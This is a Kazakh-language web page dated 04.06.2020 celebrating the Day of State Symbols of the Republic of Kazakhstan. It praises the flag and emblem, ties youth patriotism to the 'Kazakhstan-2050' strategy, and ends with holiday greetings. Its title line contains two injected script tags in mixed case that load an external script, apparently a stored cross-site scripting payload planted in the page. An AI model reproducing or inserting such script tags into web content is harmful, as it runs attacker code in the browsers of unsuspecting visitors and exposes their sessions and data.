Қазақстан Республикасының Мемлекеттік рәміздер күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.06.2020

Еліміздің Мемлекеттік рәміздері біздің тарихи өткенімізді бейнелейді. Олар біздің бүгінгі таңда неге талпынатынымыз туралы айтады. Олар арқылы әлемдегі қазақстандық қоғамның бейнесі жасалады.
Олар Мемлекет басшысы жүргізіп отырған саясатқа негізделген құндылықтарды жүзеге асырады. Бұл — ашықтық, бейбітшілік, еркіндік, тәуелсіздік және келісім. Сондықтан Мемлекеттік рәміздер мемлекет азаматтары үшін, өскелең ұрпақ үшін үлкен адамгершілік мәнге ие.
Нағыз патриот үшін Ту, Елтаңба – бұл тек қана символдар емес, бұл туған жер бетіндегі аспан мен күн, бұл туған үй бейнесі. Әрбір азамат өз елінің патриоты ретінде мемлекеттік рәміздерге құрметпен қарауға тиіс. Жастар арасында патриотизмді тәрбиелеу Мемлекет басшысының «Қазақстан-2050» стратегиясы: қалыптасқан мемлекеттің жаңа саяси бағыты» атты Жолдауында қойылған басым міндеттердің бірі болып табылады.
Мерекелеріңізбен! Сіздерге зор денсаулық, бақыт пен амандық, біздің Отанымыз – Қазақстан Республикасының игілігі жолындағы еңбектеріңізге табыс тілейміз!

Просмотров: 789


Пікір қосу



Деректерді қолтаңбаға қосу